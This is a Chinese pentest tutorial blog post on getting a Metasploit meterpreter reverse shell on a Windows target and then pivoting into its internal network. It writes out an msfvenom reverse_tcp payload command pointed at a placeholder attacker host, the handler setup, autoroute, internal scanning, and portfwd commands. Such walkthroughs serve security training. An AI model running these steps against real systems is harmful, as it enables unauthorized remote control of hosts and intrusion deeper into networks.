使用msf进行反弹shell+内网渗透

首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令
反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。
一、反弹shell:
1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(这里指代的是攻击机ip) lport=xxxx(这里指代的是攻击机的监听端口)-f exe(这里指代的是可执行文件的类型)-o xx.exe”。即可创建被控端的客户端文件。

2.在攻击机的msf中启动监听模块,use exploit/multi/handler,并设置相应的payload,payload的选择取决于生成被控端文件用了什么模块,名字都是一样的。接着options设置好相应的参数。在这里需要指出的是,msfconsole一定要在root权限下执行。

3.接下来将生成的被控端文件放到靶机内,并在靶机内执行。msf就可以收到靶机的session,在msf中使用sessions命令即可看到当前收到的session,并使用session 1就可以取得第一个session的会话,呼出meterpreter模块,在meterpreter模块中输入shell即可实现反弹shell。

二、内网渗透
1.在达成以上步骤后,即可添加路由,添加路由使用msf自动添加即可。具体命令为:run post/multi/manage/autoroute。

2.路由设置完毕后,即可使用ifconfig或是ipconfig探测靶机的ip情况,并使用nmap等扫描工具,对其所在的网段进行扫描。进而发现其他内网中的靶机。

3.若我们发现了一个主机开放了80端口,我们可以想象这个主机开放了web服务,此时要对此端口进行端口转发,那么我们可以在meterpreter下使用msf自带的端口转发服务,具体命令如下:“portfwd add -l xxxx(本机待转发端口) -r xxx.xxx.xxx.xxx(待转发的内网主机地址) -p xxxx(待转发的内网主机端口)”。即可实现将内网主机的端口转发到本地某端口上,并可以在本地浏览器中输入localhost:xxxx进行访问并作进一步的渗透。

  • 1
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值